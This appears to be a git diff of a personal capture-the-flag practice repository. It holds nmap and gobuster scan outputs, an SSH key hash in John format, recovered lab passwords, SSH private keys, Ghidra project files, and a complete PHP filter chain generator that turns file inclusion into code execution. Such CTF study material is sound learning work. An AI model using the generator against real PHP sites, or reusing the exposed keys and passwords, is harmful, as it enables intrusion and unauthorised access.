OsCP/iugxt7u+91J7qov/RBTrO7GeyX5Lc/SW1j6T6sjKEga8m9fS10h4TErePkT
t/CCVLBkM22Ewao8glguHN5VtaNH0mTLnpjfNLVJCDHl0hKzi3zZmdrxhql+/WJQ
4eaCAHk1hUL3eseN3ZpQWRnDGAAPxH+LgPyE8Sz1it8aPuP8gZABUFjBbEFMwNYB
e5ofsDLuIOhCVzsw/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----

1
CTF/BasicPentesting/pass_hash.txt Normal file
View File

@@ -0,0 +1 @@
heresareallystrongpasswordthatfollowsthepasswordpolicy3519

4
CTF/BasicPentesting/scan1.gnmap Normal file
View File

@@ -0,0 +1,4 @@
# Nmap 7.95 scan initiated Wed Oct 15 20:06:23 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oG scan1.gnmap 10.10.208.221
Host: 10.10.208.221 () Status: Up
Host: 10.10.208.221 () Ports: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, 139/open/tcp//netbios-ssn//Samba smbd 4/, 445/open/tcp//netbios-ssn//Samba smbd 4/, 8009/open/tcp//ajp13//Apache Jserv (Protocol v1.3)/, 8080/open/tcp//http//Apache Tomcat 9.0.7/ Ignored State: closed (994) OS: Linux 4.15 Seq Index: 260 IP ID Seq: All zeros
# Nmap done at Wed Oct 15 20:06:44 2025 -- 1 IP address (1 host up) scanned in 20.58 seconds

68
CTF/BasicPentesting/scan2.nmap Normal file
View File

@@ -0,0 +1,68 @@
# Nmap 7.95 scan initiated Wed Oct 15 20:54:03 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN scan2.nmap --script smb* 10.10.208.221
Nmap scan report for 10.10.208.221
Host is up (0.097s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 4
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 4
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-capabilities:
| 2:0:2:
| Distributed File System
| 2:1:0:
| Distributed File System
| Leasing
| Multi-credit operations
| 3:0:0:
| Distributed File System
| Leasing
| Multi-credit operations
| 3:0:2:
| Distributed File System
| Leasing
| Multi-credit operations
| 3:1:1:
| Distributed File System
| Leasing
|_ Multi-credit operations
| smb2-time:
| date: 2025-10-15T18:54:20
|_ start_date: N/A
|_smb-print-text: false
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
| smb-protocols:
| dialects:
| 2:0:2
| 2:1:0
| 3:0:0
| 3:0:2
|_ 3:1:1
|_smb-flood: ERROR: Script execution failed (use -d to debug)
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 67.19 ms 10.14.0.1
2 83.55 ms 10.10.208.221
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 15 20:54:27 2025 -- 1 IP address (1 host up) scanned in 23.85 seconds

1
CTF/BasicPentesting/ssh_john.txt Normal file
View File

@@ -0,0 +1 @@
id_rsa:$sshng$1$16$6ABA7DE35CDB65070B92C1F760E2FE75$2352$22835bfc9d2ad8f779e84676de801a2712ef86e499d5cad1af838d19402729c471837fbdbe7eb172e8e9cd40ee52d959a3d772204241e305194ee7813ec99be3ced17455644ce550ad51edcb52b668bcb62e46b60a77e3cfc2e5bfe14c69db0d5d1be3c3f1d18867173d8f01ee7b00d5e88f62b3d91c81f740e14862548f318bfbf510bae62e9fae40d2bf15f36dd7d702400dfb74f9154e3d00454a049b599cb4c4070df59b18efd252d702a21a5f941f79731a70840e51608701396955798d946e01686edc557b350263e279f971eee37846e07d3594b8669d25a656c26f85046b05f44edf9529dea4ce1f8193469485640909d9dbfd4f9d45ab2ede8c6aca494a53674fb1e53bae5bcf02a6bacbea202bfc284db9d3ae446780aa8b431325948599c9ee32acb1137dcdbbe61cd555887a1642e0b4e7da972d1b32a188accf9e595a173ab64f065bfc8b23530dd0c4de3463a9b38694fb34d6101628847150f684af5f25719f8e958d34570da834bdb129482d4295768f01f4e3219d5db7c92d85a55f19c926954c84a0ba6bbe697b8655c5f98cb7441c2b8a0a3b569118ca8b14dc1a3f125857a1dab94a1513137b6d4a68f9e2d856ce66a39b5ba560e18b43517e718fd6de9b9fb4ef6fbec009ac86cc774ba4802a666bffd21c114e7adb455858d4251fef118d99b9b3607ccd130329a44da2f261526951422440b7703827e53bd05177e1e82249455ae177157256a563b28b7e0b317b99b5a6e6716c4cf3e53a79dd0ba266ad41148de21b2f305c5ba6d7e6cf9bf7978579c79632655e0745a1aa73ed0ed56d837b05763c69d218065ea2b86c03019cce1c84570aed1a6f0918ec2b25985440c9318bdcf3b674cacbcea559fd5a714e51d38df94e2960fe8f98d53865dd907a434859811764864ccb2a6e18215d03448045febf90ac06a073800822b78a101028a6cef927e581705a1d76fa934a1c31001620ec5826e9cf28df1bcf39502c9b3526b65789b86555a3de57b5f6e4d694caee6ee1b82d1616ff7fc68129b7a5e1795647ee07c5ba2da49c7a45507210f67f91588eab74b51a9c074916689f7db4c40e2138f91c1bae890f21e54ba077dbcb95888e836ba7eb6223a70384c48c94cf3b946971210a40a220eb980809ba5c5a3d54e08f6610765e1dcd2bda5cae7d96e77d852bd2a095a3cfa64bc5fbe6c79ea0dcfc6ae40be03238217213ab9b1a0873f8cbf9ed9b3d40dd0d0536365702a7452bf85301d84c4397621979cdc37b5b983f301af78655f352684c57799037f633a09b755ba0de9c017a73d76e0a8f46c4c33c4207358a8b408f1c52d8b8ca0378ba8ffcd224a125e5a0973c6997a6225e51007e600c22d3e24ebbc1e8bd8ff250eb32d44f4bd298ba27a3522215db0c3b89d49f2277cfedd74c3b59a1497936263826308f2e14cd363025aa7a5c39aa9a77b815dd10ff6ac9a5d8bda4074513f0fad3b6df926da5ca3c51f47479a8c271a60dab493fe78cadce92f3debe1c05ef72f3f194a36d23bfa3b0d4f0b8f04236d485be8d7d97dfb1c5de79613568d58f113308e8a73c7b87ca11b7b53e63d37f055b5bb7e5f39982e7bbedea3aae16daa3b29ccd8f9d98d53e97a1fbc0c1a2e701e5b7d7b224a4371358b02103e25b29c54138b8c4b7c9706967fe384b263c284ceb0336887e7da79e3c10d54d85689c0db4c379388b2138d0c40017fd2256aae3a2d21a93116a134d5f0ce8ce1fbf2c61509868c823fccdff62aca54796ff99aa5b0bc588af10537f26eccfa6962e595fbeac9df244f6cbaf6b77a11cfd8078de615833305fe0ae0d22173e8d744435fe3a69a81313109f9c5cdcb56d67544a36aa27a3b7c0db50b3b829972368ff2ed998c1910b392720c0d4cbaa907a49f2c38f970503971d64b6972f5b7b5c34735a08129c2b7ee82c6ccc49ddc943a5ae2f4467c5d7a07859e39ae00023c771d59caca0817ce412d35849abd9d225ed96e34de5266b31fd4dd82dab9469582b1e41687a39f108da54b6e84771542cb11f5c522e62b79b6867e8a20df2e8c9bf9ff36634c0de536fa3d377fa27543b6c90895f13bdf50f03b2dd97e5d25d452fa6a0d225704eb3c19751864285dfe3031bc2ff5b0c5d19a7feae6ad5625757477aa3c3f0eb635717f1f5b9037b3a76425db2a2151e2810eefbb75853d939360d1240093b2497a8903eff9b98bc705c2afe0e5541af2bb06b0ec50e4caf798a7f59ffc3a3e70565d887b9f694bdfa64d15a70ed55eacccc69af3fe3cf5aa5b6e3a7186eb5036e12efe53fcc509719a6a6f3ec0c008cb6a035229a1597d9be6beb13444d84c93f2164844c8ae69aa13648578087b98e90dd03f9da47d9ce306dddc88dd80998bf6d3910d209bebb1a70f8b73d944d949b1b1b19b13a455776f3c2e6647fa6722fc2bad5b202502684e91514a11e3437a92a09febffcfc3d55095b43e14b0567e8f5cbd91728b693fe82b8f75ccaf27c0651152faaf0610d2edcabc0b9ac51895180fbf60b868771dee58edb97e99d5ca3592cc9733a76ae0b96ca5788be62e8fb006204c574482579701781b46ec979bdbc9d339e57967051ca87fadae7184bd79cac0af834632081c5df6189dcc4cc8a0170cac12c30c1fff21c4c17f20813112bf901df81c5d78ca22024f1cd58cb5b73c1d68c6529ce4b21d7b95941e099f9a6140bdd1f0ead9113b2e5f17c354aacf79a38a104d6f844559417552387182ba20d890203a6a5e9661d23d8b6fae351a208ef5550555592011fec39609858b6b22743b0cca80c97d58076a660be95e460177cab3fd6b690b01a0e4f5d0507157afe9c4dc7f384187256a9a5d56ab00d466d44e4f07e5f348e8f100e5abe1c4d1bbc207fa3617140a604b607c7e3f5020f9aabb0700ad790e7847e085eb2243e503bf7d097ae15a2ee6179262e351773bb880123c0a87a43f62380fbe08fc2c63ac08ffe2ba0c6deeefbdd49eeaa2ffd1053aceec67b25f92dcfd25b58fa4fab2328481af26f5f4b5d21e1312b78f913b7f08254b064336d84c1aa3c82582e1cde55b5a347d264cb9e98df34b5490831e5d212b38b7cd999daf186a97efd6250e1e6820079358542f77ac78ddd9a505919c318000fc47f8b80fc84f12cf58adf1a3ee3fc8190015058c16c414cc0d6017b9a1fb032ee20e842573b30fc3214ac5fb8962437477e81bb6479fa498f148924796d6d616218ec2a5fa0949def8542dc9b75fd95b75c26fbe91ef9b06e61e90e0df20bb973f33471dab5e87f4c1f0a5d8a7f4e653a8edb337116fa6e5ed858

28
CTF/BillingV2/gobuster.output Normal file
View File

@@ -0,0 +1,28 @@
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://billingv2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/akeeba.backend.log (Status: 403) [Size: 274]
/development.log (Status: 403) [Size: 274]
/index.php (Status: 302) [Size: 1] [--> ./mbilling]
/production.log (Status: 403) [Size: 274]

33
CTF/BillingV2/nmap.output Normal file
View File

@@ -0,0 +1,33 @@
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-23 11:45 CET
Nmap scan report for billingv2 (10.10.156.162)
Host is up (0.042s latency).
rDNS record for 10.10.156.162: BillingV2
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://billingv2/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry
|_/mbilling/
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 2.10.6
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 40.91 ms 10.14.0.1
2 41.06 ms BillingV2 (10.10.156.162)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.35 seconds

BIN
CTF/BrooklynNineNine/brooklyn99.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 68 KiB

4
CTF/BrooklynNineNine/brooklyn99.jpg.out Normal file
View File

@@ -0,0 +1,4 @@
Holts Password:
fluffydog12@ninenine
Enjoy!!

1
CTF/BrooklynNineNine/gobuster_scan1.txt Normal file
View File

@@ -0,0 +1 @@
/server-status  (Status: 403) [Size: 278]

43
CTF/BrooklynNineNine/nmap_scan1.nmap Normal file
View File

@@ -0,0 +1,43 @@
# Nmap 7.95 scan initiated Thu Oct 16 13:14:44 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.nmap 10.10.151.224
Nmap scan report for 10.10.151.224
Host is up (0.068s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.99.89
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 91.15 ms 10.14.0.1
2 79.62 ms 10.10.151.224
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 16 13:14:56 2025 -- 1 IP address (1 host up) scanned in 12.68 seconds

4
CTF/BrooklynNineNine/note.txt Normal file
View File

@@ -0,0 +1,4 @@
Holts Password:
fluffydog12@ninenine
Enjoy!!

1293
CTF/CheeseCTF/nmap_scan1.txt Normal file
View File

File diff suppressed because it is too large Load Diff

2
CTF/CheeseCTF/payload.txt Normal file
View File

File diff suppressed because one or more lines are too long

131
CTF/CheeseCTF/php_filter_chain_generator.py Normal file
View File

@@ -0,0 +1,131 @@
#!/usr/bin/env python3
import argparse
import base64
import re
# - Useful infos -
# https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
# https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
# https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
# No need to guess a valid filename anymore
file_to_use = "php://temp"
conversions = {
'0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
'5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
'6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
'8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
'=': ''
}
def generate_filter_chain(chain, debug_base64 = False):
encoded_chain = chain
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in encoded_chain[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
if not debug_base64:
# don't add the decode while debugging chains
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
return final_payload
def main():
# Parsing command line arguments
parser = argparse.ArgumentParser(description="PHP filter chain generator.")
parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False)
parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False)
args = parser.parse_args()
if args.chain is not None:
chain = args.chain.encode('utf-8')
base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
chain = generate_filter_chain(base64_value)
print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value))
print(chain)
if args.rawbase64 is not None:
rawbase64 = args.rawbase64.replace("=", "")
match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
if (match):
chain = generate_filter_chain(rawbase64, True)
print(chain)
else:
print ("[-] Base64 string required.")
exit(1)
if __name__ == "__main__":
main()

7
CTF/CheeseCTF/ssh_cheese_ctf Normal file
View File

@@ -0,0 +1,7 @@
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCwFtioAWAvUB2k0CSXgFA5AyTxMtZkeK1TzHWfxkAkagAAAJgQviaREL4m
kQAAAAtzc2gtZWQyNTUxOQAAACCwFtioAWAvUB2k0CSXgFA5AyTxMtZkeK1TzHWfxkAkag
AAAEDjpDdBuZRPRIkBZNHXZpWpFCxAYgFqEJxVuqVhrVmBpbAW2KgBYC9QHaTQJJeAUDkD
JPEy1mR4rVPMdZ/GQCRqAAAAEW5pa0BrYWxpLWxlYXJuaW5nAQIDBA==
-----END OPENSSH PRIVATE KEY-----

1
CTF/CheeseCTF/ssh_cheese_ctf.pub Normal file
View File

@@ -0,0 +1 @@
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILAW2KgBYC9QHaTQJJeAUDkDJPEy1mR4rVPMdZ/GQCRq nik@kali-learning

BIN
CTF/Compiled/Compiled-1688545393558.Compiled Executable file
View File

Binary file not shown.

0
CTF/Compiled/Compiled.gpr Normal file
View File

11
CTF/Compiled/Compiled.rep/idata/00/00000000.prp Normal file
View File

@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<FILE_INFO>
<BASIC_INFO>
<STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
<STATE NAME="PARENT" TYPE="string" VALUE="/" />
<STATE NAME="FILE_ID" TYPE="string" VALUE="7f011960d2115982921274" />
<STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
<STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
<STATE NAME="NAME" TYPE="string" VALUE="Compiled-1688545393558.Compiled" />
</BASIC_INFO>
</FILE_INFO>

BIN
CTF/Compiled/Compiled.rep/idata/00/~00000000.db/db.2.gbf Normal file
View File

Binary file not shown.

4
CTF/Compiled/Compiled.rep/idata/~index.bak Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
NEXT-ID:0
MD5:d41d8cd98f00b204e9800998ecf8427e

5
CTF/Compiled/Compiled.rep/idata/~index.dat Normal file
View File

@@ -0,0 +1,5 @@
VERSION=1
/
00000000:Compiled-1688545393558.Compiled:7f011960d2115982921274
NEXT-ID:1
MD5:d41d8cd98f00b204e9800998ecf8427e

2
CTF/Compiled/Compiled.rep/idata/~journal.bak Normal file
View File

@@ -0,0 +1,2 @@
IADD:00000000:/Compiled-1688545393558.Compiled
IDSET:/Compiled-1688545393558.Compiled:7f011960d2115982921274

6
CTF/Compiled/Compiled.rep/project.prp Normal file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<FILE_INFO>
<BASIC_INFO>
<STATE NAME="OWNER" TYPE="string" VALUE="nik" />
</BASIC_INFO>
</FILE_INFO>

10
CTF/Compiled/Compiled.rep/projectState Normal file
View File

@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="UTF-8"?>
<PROJECT>
<PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
<SAVE_STATE />
</PROJECT_DATA_XML_NAME>
<TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
<WORKSPACE NAME="Workspace" ACTIVE="true" />
</TOOL_MANAGER>
</PROJECT>

11
CTF/Compiled/Compiled.rep/user/00/00000000.prp Normal file
View File

@@ -0,0 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<FILE_INFO>
<BASIC_INFO>
<STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
<STATE NAME="PARENT" TYPE="string" VALUE="/" />
<STATE NAME="FILE_ID" TYPE="string" VALUE="7f011b43f2324964913775" />
<STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
<STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
<STATE NAME="NAME" TYPE="string" VALUE="udf_7f011960d2115982921274" />
</BASIC_INFO>
</FILE_INFO>

BIN
CTF/Compiled/Compiled.rep/user/00/~00000000.db/db.1.gbf Normal file
View File

Binary file not shown.

4
CTF/Compiled/Compiled.rep/user/~index.dat Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
